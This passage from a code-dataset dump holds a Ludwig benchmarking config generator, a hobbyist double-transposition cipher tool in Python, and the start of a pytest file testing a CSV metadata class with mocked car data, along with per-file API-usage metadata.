"polygraphy.util", "line_number": 309, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 312, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 312, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 322, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 322, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 337, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 337, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 340, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 340, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 353, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 353, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 358, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 358, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 361, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 361, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 375, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config.get_flag", "line_number": 390, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 390, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 394, "usage_type": "call"}, {"api_name": "polygraphy.config.engine_capability", "line_number": 395, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 395, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 398, "usage_type": "call"}, {"api_name": "polygraphy.config.get_memory_pool_limit", "line_number": 400, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 400, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 408, "usage_type": "call"}, {"api_name": "polygraphy.config.get_tactic_sources", "line_number": 409, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 409, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 414, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 414, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 414, "usage_type": "attribute"}, {"api_name": "contextlib.suppress", "line_number": 417, "usage_type": "call"}, {"api_name": "polygraphy.config.profiling_verbosity", "line_number": 418, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 418, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 421, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 421, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 422, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 422, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 425, "usage_type": "call"}, {"api_name": "polygraphy.config.get_preview_feature", "line_number": 426, 
"usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 426, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 431, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 431, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 432, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 432, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 439, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 439, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 480, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 480, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 482, "usage_type": "call"}, {"api_name": "polygraphy.util.is_shape_dynamic", "line_number": 490, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 490, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 497, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 497, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 501, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 501, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 520, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 520, "usage_type": "name"}, {"api_name": "polygraphy.config.get_calibration_profile", "line_number": 529, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 529, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 531, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 531, "usage_type": "name"}, {"api_name": "polygraphy.exception.PolygraphyException", "line_number": 538, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 539, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 539, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 543, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 543, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 562, "usage_type": "call"}, {"api_name": "polygraphy.util.default", "line_number": 578, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 578, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 579, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 579, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 615, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 615, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 626, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 626, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 646, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 646, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 658, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 663, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 664, 
"usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 673, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 687, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 687, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 689, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 689, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 694, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 694, "usage_type": "name"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 695, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 695, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 704, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 704, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 705, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 705, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 706, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 706, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 710, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 710, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 716, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 716, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 729, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 729, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 731, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 740, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 740, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 742, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 751, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 751, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 768, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 768, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 772, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 772, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 781, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 781, "usage_type": "name"}]}
+{"seq_id": "42742917788", "text": "import logging\nimport os\nimport pdb\n\nfrom copy import deepcopy\n\nimport yaml\n\nimport globals\nfrom globals import *\nfrom lbt.utils.experiment_utils import load_yaml\n\ntemplate = load_yaml(CONFIG_TEMPLATE_FILE)\ndataset_metadata = load_yaml(DATASET_METADATA_FILE)\nhyperopt_config = load_yaml(HYPEROPT_CONFIG_FILE)\n\n\ndef insert_global_vars(config):\n \"\"\" replace global variable placeholders with respective values \"\"\"\n for key, value in config.items():\n if type(value) != dict and value in vars(globals):\n config[key] = getattr(globals, value)\n\n\ndef build_config_files():\n config_fps = {}\n config = deepcopy(template)\n\n encoder_hyperopt_vals = []\n # select relevant encoders\n for encoder_filename in globals.ENCODER_FILE_LIST:\n with open(os.path.join(ENCODER_CONFIG_DIR, encoder_filename)) as f:\n encoder_hyperopt_params = yaml.load(f, Loader=yaml.SafeLoader)\n encoder_hyperopt_vals.append(encoder_hyperopt_params)\n\n # select relevant datasets\n selected_datasets = {}\n for dataset_name in globals.DATASETS_LIST:\n if dataset_name in dataset_metadata.keys():\n selected_datasets[dataset_name] = dataset_metadata[dataset_name]\n else:\n raise ValueError(\n \"The dataset you provided is not available.\"\n \"Please see list of available datasets here: \"\n \"python experiment_drivery.py --h\"\n )\n\n config[\"hyperopt\"].update(hyperopt_config)\n\n for dataset, metadata in selected_datasets.items():\n # each dataset will have a model specific config file\n config_fps[dataset] = []\n\n for idx, input_feature_name in enumerate(metadata[\"input_features\"]):\n ipt_feat = deepcopy(config[\"input_features\"][0])\n ipt_feat[\"name\"] = input_feature_name[\"name\"]\n ipt_feat[\"type\"] = input_feature_name[\"type\"]\n if idx == 0:\n config[\"input_features\"] = [ipt_feat]\n else:\n config[\"input_features\"].append(ipt_feat)\n for idx, output_feature_info in enumerate(metadata[\"output_features\"]):\n out_feat = deepcopy(config[\"output_features\"][0])\n out_feat[\"name\"] = output_feature_info[\"name\"]\n out_feat[\"type\"] = output_feature_info[\"type\"]\n if idx == 0:\n config[\"output_features\"] = [out_feat]\n else:\n config[\"output_features\"].append(out_feat)\n\n if len(metadata[\"output_features\"]) > 1:\n config[\"hyperopt\"][\"output_feature\"] = \"combined\"\n else:\n config[\"hyperopt\"][\"output_feature\"] = metadata[\"output_features\"][\n 0\n ][\"name\"]\n\n input_feature_names = metadata[\"input_features\"]\n output_feature_names = metadata[\"output_features\"]\n\n for encoder_hyperopt_params in encoder_hyperopt_vals:\n curr_config = deepcopy(config)\n encoder_name = encoder_hyperopt_params[\"parameters\"][\n \"input_features.name.encoder\"\n ]\n\n # update input and output parameters (not preprocessing)\n for idx in range(len(curr_config[\"input_features\"])):\n curr_config[\"input_features\"][idx].update(\n encoder_hyperopt_params[\"input_features\"][idx]\n )\n insert_global_vars(curr_config[\"input_features\"][idx])\n\n for idx in range(len(curr_config[\"output_features\"])):\n if \"output_features\" in encoder_hyperopt_params.keys():\n curr_config[\"output_features\"][idx].update(\n encoder_hyperopt_params[\"output_features\"][idx]\n )\n insert_global_vars(curr_config[\"output_features\"][idx])\n\n # handle encoder specific preprocessing\n for idx in range(len(curr_config[\"input_features\"])):\n try:\n preprocessing = curr_config[\"input_features\"][idx][\n \"preprocessing\"\n ]\n for key, _ in preprocessing.items():\n 
preprocessing[key] = encoder_hyperopt_params[\n \"input_features\"\n ][idx][\"preprocessing\"][key]\n\n except:\n pass #no preprocessing param\n # handle encoder specific training params\n if \"training\" in encoder_hyperopt_params.keys():\n curr_config[\"training\"].update(\n encoder_hyperopt_params[\"training\"]\n )\n\n def input_or_output_feature(param_key):\n if param_key.split(\".\")[0] == \"input_features\":\n return True\n return False\n\n # handle encoder specific hyperopt\n input_encoder_hyperopt_params = {\n \"parameters\": {\n input_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for input_feat in input_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and input_or_output_feature(key)\n }\n }\n\n # handle encoder specific hyperopt\n output_encoder_hyperopt_params = {\n \"parameters\": {\n output_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for output_feat in output_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and not input_or_output_feature(key)\n }\n }\n\n ds_encoder_hyperopt_params = {\n \"parameters\": {\n **output_encoder_hyperopt_params[\"parameters\"],\n **input_encoder_hyperopt_params[\"parameters\"],\n }\n }\n curr_config[\"input_features\"][0][\"encoder\"] = encoder_name\n\n # populate hyperopt parameters w/encoder specific settings\n curr_config[\"hyperopt\"].update(\n {\n \"parameters\": {\n **ds_encoder_hyperopt_params[\"parameters\"],\n **hyperopt_config[\"parameters\"],\n }\n }\n )\n\n config_fp = os.path.join(\n EXPERIMENT_CONFIGS_DIR, f\"config_{dataset}_{encoder_name}.yaml\"\n )\n with open(config_fp, \"w\") as f:\n yaml.dump(curr_config, f)\n\n config_fps[dataset].append(config_fp)\n\n return config_fps\n", "repo_name": "HazyResearch/ludwig-benchmarking-toolkit", "sub_path": "lbt/build_def_files.py", "file_name": "build_def_files.py", "file_ext": "py", "file_size_in_byte": 6799, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 13, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 14, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 15, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 27, "usage_type": "call"}, {"api_name": "globals.ENCODER_FILE_LIST", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 33, "usage_type": "call"}, {"api_name": "yaml.SafeLoader", "line_number": 33, "usage_type": "attribute"}, {"api_name": "globals.DATASETS_LIST", "line_number": 38, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 55, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 173, "usage_type": "call"}]}
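The build_def_files.py record above leans on copy.deepcopy so that per-dataset and per-encoder overrides never bleed back into the shared template it starts from. A stripped-down sketch of that pattern with a made-up two-field template (not the toolkit's real schema), using the same PyYAML dependency the file imports:

import copy

import yaml  # PyYAML, the same dependency the file above uses

TEMPLATE = {"input_features": [{"name": None, "type": None}], "training": {"epochs": 10}}

def render_config(feature_name, feature_type):
    # Copy first, then mutate: the shared template stays pristine.
    config = copy.deepcopy(TEMPLATE)
    config["input_features"][0]["name"] = feature_name
    config["input_features"][0]["type"] = feature_type
    return yaml.dump(config)

print(render_config("review", "text"))
print(TEMPLATE["input_features"][0]["name"])  # still None: deepcopy protected it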
+{"seq_id": "70111771687", "text": "\"\"\"\r\nThe python code here implements a cipher that I am calling Randomness Hardened Double Transposition(RHDT)\r\n\r\n---LICENSE---\r\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with this program. If not, see .\r\nCopyright cryptoam 2023\r\n\"\"\"\r\nimport secrets\r\n\r\ndef main():\r\n print(\"This is the RHDT tool\")\r\n print(\"All inputs must be uppercase letters with no symbols or spaces\")\r\n print(\"Program is liable to crash or malfunction if invalid input is provided\")\r\n exit_enable=False\r\n while exit_enable==False:\r\n mode=input(\"Encrypt(E) or Decrypt(D) or Exit(EXIT)?\\n--->\")\r\n if mode==\"E\":\r\n encrypt_mode()\r\n elif mode==\"D\":\r\n decrypt_mode()\r\n elif mode==\"EXIT\":\r\n exit_enable=True\r\n else:\r\n print(\"Invalid entry, try again\")\r\n input(\"Press enter to end program\")\r\n\r\ndef encrypt_mode():\r\n print(\"In encryption mode now\")\r\n plaintext=input(\"What is the plaintext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Plaintext is: \"+plaintext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=preprocess_forward(plaintext)\r\n ciphertext=double_transpose_encrypt(preprocessed_plaintext, key1, key2)\r\n print(\"Ciphertext is: \"+ciphertext)\r\n\r\ndef decrypt_mode():\r\n print(\"In decryption mode now\")\r\n ciphertext=input(\"What is the ciphertext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Ciphertext is: \"+ciphertext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=double_transpose_decrypt(ciphertext, key1, key2)\r\n plaintext=preprocess_backward(preprocessed_plaintext)\r\n print(\"Plaintext is: \"+plaintext)\r\n\r\ndef preprocess_forward(plaintext):\r\n # Convert the plaintext into a stream of 0-25\r\n plaintext_stream=[]\r\n for char in plaintext:\r\n num=ord(char)-ord(\"A\")\r\n plaintext_stream.append(num)\r\n # Obtain an actually random(read: unpredictable to adversary) stream of 0-25\r\n random_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n random_num=secrets.randbelow(26)\r\n random_stream.append(random_num)\r\n # Now start crossing the streams\r\n # :P\r\n preprocessed_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n char_num=plaintext_stream[i]\r\n random_num=random_stream[i]\r\n a=((2*char_num)+random_num)%26\r\n b=(char_num+random_num)%26\r\n preprocessed_stream.append(a)\r\n preprocessed_stream.append(b)\r\n # Convert the numbers in the preprocessed stream back into letters\r\n preprocessed_plaintext=\"\"\r\n for num in preprocessed_stream:\r\n char=chr(num+ord(\"A\"))\r\n preprocessed_plaintext=preprocessed_plaintext+char\r\n return(preprocessed_plaintext)\r\n\r\ndef preprocess_backward(preprocessed_plaintext):\r\n # Convert the preprocessed plaintext into a stream of 0-25\r\n number_stream=[]\r\n for char in 
preprocessed_plaintext:\r\n num=ord(char)-ord(\"A\")\r\n number_stream.append(num)\r\n # Convert the stream of numbers into a stream of tuples (a,b)\r\n tuple_stream=[]\r\n for i in range(0, len(number_stream), 2):\r\n tuple_stream.append((number_stream[i],number_stream[i+1]))\r\n # Now we process each tuple to recover the plaintext number\r\n plaintext_stream=[]\r\n for tup in tuple_stream:\r\n a=tup[0]\r\n b=tup[1]\r\n c=a-b\r\n if c<0:\r\n plaintext_num=c+26\r\n else:\r\n plaintext_num=c\r\n plaintext_stream.append(plaintext_num)\r\n # Finally recover the plaintext from the stream of 0-25\r\n plaintext=\"\"\r\n for num in plaintext_stream:\r\n char=chr(num+ord(\"A\"))\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef transpose_encrypt(plaintext, key):\r\n columns = len(key)\r\n rows = (len(plaintext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the plaintext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Fill the grid with the plaintext\r\n index = 0\r\n for row in range(rows):\r\n for col in range(columns):\r\n if index < len(plaintext):\r\n grid[row][col] = plaintext[index]\r\n index=index+1\r\n else:\r\n grid[row][col]=\"$\"\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Create a new grid\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Fill in the new grid according the the sorted collum\r\n for row in range(rows):\r\n for col in range(columns):\r\n new_grid[row][col]=grid[row][sorted_columns[col]]\r\n # Extract the ciphertext from the new grid using the sorted columns \r\n ciphertext = \"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass\r\n else:\r\n ciphertext=ciphertext+char\r\n return (ciphertext)\r\n\r\ndef transpose_decrypt(ciphertext, key):\r\n columns = len(key)\r\n rows = (len(ciphertext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the ciphertext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Fill in the grid for the full rows\r\n index = 0\r\n for row in range(rows-1):\r\n for col in range(columns):\r\n if index < len(ciphertext):\r\n grid[row][col] = ciphertext[index]\r\n index=index+1\r\n # We need to be careful now\r\n # The last row is not garunteed to be full, must now perform a check\r\n a=(len(ciphertext)%columns)\r\n if a==0:\r\n # We do not need to worry, we can just carry on\r\n # The length of the ciphertext is a multiple of the key, there will not be mismatched column lengths\r\n for col in range(columns):\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n else:\r\n # Turns out we do need to worry, column lengths will be mismatched\r\n for col in range(columns):\r\n current_collum_index=sorted_columns[col]\r\n if current_collum_index>=a:\r\n #We are writing to a column that does not have a character, pad it instead\r\n grid[rows-1][col]=\"$\"\r\n else:\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Copy characters over to the new grid but this time with the 
collumns in the right place\r\n index=0\r\n for col in sorted_columns:\r\n for row in range(rows):\r\n char=grid[row][index]\r\n new_grid[row][col]=char\r\n index=index+1\r\n # Extract the plaintext from the grid\r\n plaintext=\"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass #padding, ignore and move on to the next one\r\n else:\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef double_transpose_encrypt(plaintext, key1, key2):\r\n partial_encrypt=transpose_encrypt(plaintext, key1)\r\n ciphertext=transpose_encrypt(partial_encrypt, key2)\r\n return(ciphertext)\r\n\r\ndef double_transpose_decrypt(ciphertext, key1, key2):\r\n partial_decrypt=transpose_decrypt(ciphertext, key2)\r\n plaintext=transpose_decrypt(partial_decrypt, key1)\r\n return(plaintext)\r\n\r\nif __name__==\"__main__\":\r\n main()", "repo_name": "cryptoam322/RHDT-cipher", "sub_path": "RDHT-cipher_final.py", "file_name": "RDHT-cipher_final.py", "file_ext": "py", "file_size_in_byte": 8587, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "secrets.randbelow", "line_number": 64, "usage_type": "call"}]}
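The arithmetic behind preprocess_forward and preprocess_backward in the record above is worth spelling out: each plaintext value p is paired with a random value r and emitted as the pair a = (2p + r) mod 26 and b = (p + r) mod 26, so a - b is congruent to p modulo 26 and the randomness cancels exactly on decryption without ever being transmitted. A quick exhaustive check of that identity:

# Verify (a - b) % 26 == p for every plaintext value p and random value r,
# which is why preprocess_backward never needs to know the random stream.
for p in range(26):
    for r in range(26):
        a = (2 * p + r) % 26
        b = (p + r) % 26
        assert (a - b) % 26 == p
print("round-trip identity holds for all 26 * 26 combinations")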
+{"seq_id": "24775054719", "text": "import pytest\nimport csv\nimport mock\nfrom unittest.mock import patch\nimport os\nfrom ..DataFile import Metadata, DataFile, Relation, _convert_string_to_number\n\nMANUFACTURER_VALUES = {\"Toyota\": 2, \"Volkswagon\": 1, \"Ferrari\": 1}\nMODEL_VALUES = {\"Camry\": 1, \"GTI\": 1, \"Corolla\": 1, \"Dino 246 GT\": 1}\nCOLOR_VALUES = {\"Gray\": 1, \"White\": 1, \"Black\": 1, \"Red\": 1}\nCOST_QUANT_VALUES = [\"$15,000\", \"$20,000\", \"$10,000\"]\nCOST_QUAL_VALUES = {\"N.A.\": 1}\nMPG_VALUES = [25.4, 23.2, 28.2, 18.2]\nEMPTY_VALUES = {}\n'''\nReturn a very simple, fake CSV file for testing\n'''\n@pytest.fixture()\ndef simple_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",\"25.4\",\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",\"23.2\",\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",\"28.2\",\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",\"18.2\",N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\ndef create_simple_csv(file_name=\"../test_data/simple.csv\"):\n data = [\n ['Manufacturer','Model','Color','Miles','MPG','Cost'],\n ['Toyota','Camry','Gray','75,000','25.4','$15,000'],\n ['Volkswagon','GTI','White','75,000','23.2','$20,000'],\n ['Toyota','Corolla','Black','100,000','28.2','$10,000'],\n ['Ferrari','Dino 246 GT','Red','252,346','18.2','N.A.'],\n ]\n if not os.path.isfile(file_name):\n test_file = open(file_name, \"w\", newline=\"\\n\")\n writer = csv.writer(test_file)\n writer.writerows(data)\n test_file.close()\n\n@pytest.fixture()\ndef update_cost_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,-1\\n'\n )\n return mock.mock_open(read_data=data)\n\n@pytest.fixture()\ndef update_miles_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"76,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\n'''\nBuild a test string for the metadata\n'''\ndef build_metadata_string(number, name, datatype, qual_values:dict, quant_values:list):\n string = f\"\\n datatype:{datatype}\"\n if qual_values:\n string = string + f\"; qual_values_count:{len(qual_values.keys())}\"\n if quant_values:\n string = string + f\"; quant_values_count:{len(quant_values)}\"\n if qual_values:\n string = string + f\"\\nQualitative Values ['Value': count]: {qual_values}\"\n return string\n\n'''\nTest validity of metadata object\n'''\ndef run_metadata_asserts(metadata, number, name, correct_qual_values:dict, quant_count, datatype):\n assert(metadata.name == name)\n assert(metadata.number == number)\n assert(metadata.qualitative_values == correct_qual_values)\n assert(metadata.datatype == datatype)\n assert(metadata.quantitative_values_count == quant_count)\n return True\n\n'''\nTest init to:\n\n-Make sure that column titles are added as attributes\n-Make sure data populates correctly\n'''\ndef test_init(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n assert(run_metadata_asserts(test_file.Manufacturer, 0, \"Manufacturer\", MANUFACTURER_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Model, 1, 
